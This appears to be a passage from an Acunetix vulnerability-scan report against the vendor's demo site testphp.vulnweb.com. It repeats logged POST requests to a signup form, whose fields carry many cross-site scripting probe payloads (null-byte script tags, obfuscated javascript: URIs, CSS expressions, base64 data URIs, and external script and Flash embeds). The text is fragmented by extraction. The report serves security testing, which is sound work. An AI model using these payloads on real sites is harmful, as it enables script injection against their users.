http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= alert(519135953404)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected]&upass2=111-222Acunetix Website Audit

128

[email protected][email protected]&ucc=111-222-1933email@addres [email protected][email protected]&uaddres Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= alert(519175953404)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 320 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= <%00script>alert(519735953495)%3B&signup=signup Response Acunetix Website Audit

129

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 324 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Acunetix Website Audit

130

Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= alert(519165953404)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 346 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= email@somealert(519195953404)%3Bdomain.com&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

131

/secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= %3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28519215953404%29%3B%22%3E&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= %3C/xss/*-*/style=xss:e/**/xpression(alert(521025954151))%3E&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

132

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= >">alert(519155953404)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Acunetix Website Audit

133

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= -->alert(519185953404)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected] [email protected][email protected]&signup=si gnup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request Acunetix Website Audit

134

POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=&uemail=111-222-1933emai [email protected][email protected][email protected] t&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 320 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=<%00script>alert(51993595 3605)%3B[email protected]&uphone=111-222-1933email@address. [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

135

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&uphone=111-222-1933e Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=%00'">al ert(520625953933)%3B[email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Acunetix Website Audit

136

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=al ert(520605953933)%3B[email protected]&uphone=111-222-1933e Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 357 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc="+src="http ://testphp.acunetix.com/xss.js?520585953933">&uemail=111-222-1933email@address. [email protected][email protected]&signup=s ignup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 324 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

137

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&uphone=111-222-1933email@add Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=%3C/xss/*-*/style=xss:e/* */xpression(alert(521225954258))%[email protected][email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Acunetix Website Audit

138

[email protected][email protected][email protected][email protected]&ucc=%00"'>al ert(520635953933)%3B[email protected]&uphone=111-222-1933e Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&uph [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=
139

hp.acunetix.com/xss.swf?520005953605"+type="application/x-shockwave-flash"/>[email protected][email protected]&uaddress=111-222-1933ema Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 342 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=%3Cimg%20dynsrc%3D%22JaVa ScRiPt:alert%28519975953605%29%3B%22%[email protected][email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 400 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=
140

tml%3Bbase64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo="+invalid="5199 95953605">[email protected][email protected]&ua Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&up [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected][email protected]&uaddr [email protected]&signup=signup Response Acunetix Website Audit

141

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected]&uphone [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=-->alert (519385953405)%3B[email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Acunetix Website Audit

142

Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=>">alert (519355953405)%3B[email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=%3Cimg%20src%3D%22JaVaS%2 6%2399%3BRiPt:alert%28519415953405%29%3B%22%[email protected]&upho [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

143

/secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 346 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=email@somealert(519395953405)%3B[email protected]&uphone= [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=alert(519365953405)%3B[email protected]&uphone=111-222-1 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

144

